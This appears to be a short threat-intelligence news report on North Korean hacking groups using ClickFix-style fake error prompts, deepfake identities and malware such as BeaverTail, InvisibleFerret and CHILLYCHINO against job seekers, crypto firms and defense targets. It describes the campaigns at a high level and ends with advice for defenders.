North Korean Hackers Use ClickFix, Deepfake IDs

Threat actors linked to North Korea are upgrading their tradecraft, pairing ClickFix-style error prompts with AI-generated deepfake identities to move beyond espionage into financial crime and disruptive operations, researchers say.

A new GitLab Threat Intelligence investigation details campaigns that use fake error pop-ups—prompting victims to run system commands—to deliver BeaverTail (a JavaScript stealer) and its companion InvisibleFerret (a Python backdoor). Unlike earlier dev-focused runs, this wave hit marketing and crypto-trading roles via sham recruitment portals hosted on Vercel. A staged “video assessment” ended in a bogus technical error, triggering malware execution. The latest BeaverTail is leaner, compiled for Windows, macOS, and Linux, and narrows extension targeting to eight(mostly Chrome), boosting stealth.

Building on the Contagious Interview / Gwisin Gang operations (late-2022 onward), researchers cite ~230 victims (Jan–Mar 2025), including applicants to Robinhood, eToro, and Archblock. The “ClickFake Interview” phase adds GolangGhost, PylangGhost, and FlexibleFerret, often delivered via password-protected archives.

Separately, ScarCruft (APT37) has shifted toward financial motives, debuting CHILLYCHINO, a Rust-basedWindows implant (June 2025), paired with FadeStealer for keylogging, screenshots, and audio capture; delivery uses spear-phishing ZIP/LNK/CHM lures. Use of VCD ransomware alongside spying tools signals a blended strategy.

Kimsuky (APT43) has been tied to two mid-2025 tracks: (1) GitHub abuse using stolen private tokens in PowerShell to exfiltrate telemetry to attacker repos with decoy docs; (2) deepfake military IDs in defense-themed spear-phishing targeting officials, researchers, activists, and journalists. ClickFix-style CAPTCHA gates deploy AutoIt scripts or lead to credential-harvest portals.

Bottom line: DPRK operators are diversifying targets, modernizing tooling (JS, Rust, Python), weaponizing AI, and rotating infrastructure quickly. Crypto, defense, and retail orgs should harden controls against ClickFix lures, recruitment-themed decoys, and unusual GitHub traffic.